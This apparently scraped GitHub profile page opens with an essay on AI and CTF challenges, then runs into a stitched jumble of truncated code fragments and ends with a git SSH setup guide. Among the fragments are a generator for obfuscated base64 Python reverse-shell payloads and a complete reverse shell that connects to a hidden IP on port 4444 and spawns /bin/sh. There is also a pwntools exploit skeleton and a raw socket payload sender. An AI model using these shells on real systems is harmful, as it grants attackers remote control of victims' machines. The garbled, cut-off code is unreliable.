tunelko tunelko

This document is updated frequently.

The debate is becoming polarized between those who see the use of AI in CTF challenges as a disaster and those of us who are somewhat more optimistic and see an opportunity for improvement.

  1. CTFs as we have known them are dead. It has become trivial to solve almost any type of challenge.

  2. Paradoxically, this also means they are not entirely dead. The situation creates an opportunity to rethink the model and explore ways to restrict direct access by AI systems. This is obviously not trivial.

  3. The work has to come from the technology itself. Preventing AI from solving challenges 100% of the time will be impossible, but the field will likely move toward a more normalized state once the hype and the backlash settle. It should be possible to investigate AI-detection mechanisms by studying solving patterns in dynamic challenges without inspecting the content itself, for example, response times and the flow of submissions.

$wOqsxkM = @"
#nullable enable
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
using System.Text;
namespace l4cw7gI
{

_p = """-----BEGIN PGP MESSAGE-----
Version: GnuPG

#1. generate obfuscated marshalled b64
import marshal, binascii, base64
IP = "127.0.0.1"
PORT = 1234
code = f"""
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{IP}", {PORT}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)

from pwn import *
context(arch='x86_64', os='linux')
context.terminal = ['tmux', 'splitw', '-h']
LOCAL = False
REMOTETTCP = True
REMOTESSH = False
GDB = False
local_bin = "./climb"

#!/usr/bin/python
import pyasn1.codec.der.encoder
import pyasn1.type.univ
import base64
# present values on key.pem
e = 0x010001
n = 0xC4B07FEFC8E36C05C0DA434221AEBF47DBF70E5189AD892408F3AD81182A9E0700A07C9D7C66C86C7A39602123EE0F605613DE97FDE49FE68396EE0AF3F5F5F3
p = 106173580239682931389627142547722999257831171755485751420548914984291463023277

import base64
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((base64.b64decode("base64_str_IP"),4444))
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

import socket
TCP_IP = '127.0.0.1'
TCP_PORT = 9999
BUFFER_SIZE = 1024
data = b"\x68\x16\x16\x68\x08\x00\x65\x81\x65\x00\x64\x00\x01\x01\x00\x1a\xb5\x13\x8b\x57\x07\x12\x00\x00\x00\x00\x96\x16"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.send(data)
s.close()

#!/usr/bin/env python
import argparse
# from skeleton.users import models
# from sqlalchemy.exc import SQLAlchemyError
# from collections import Counter
import json
import sys
import requests
"""

Guide for git dummies

Create the repository. Generate the SSH key:

ssh-keygen -t rsa -C "correo@dominio.com"

Copy ~/.ssh/id_rsa.pub to the GitHub account settings. Test SSH:

ssh -T git@github.com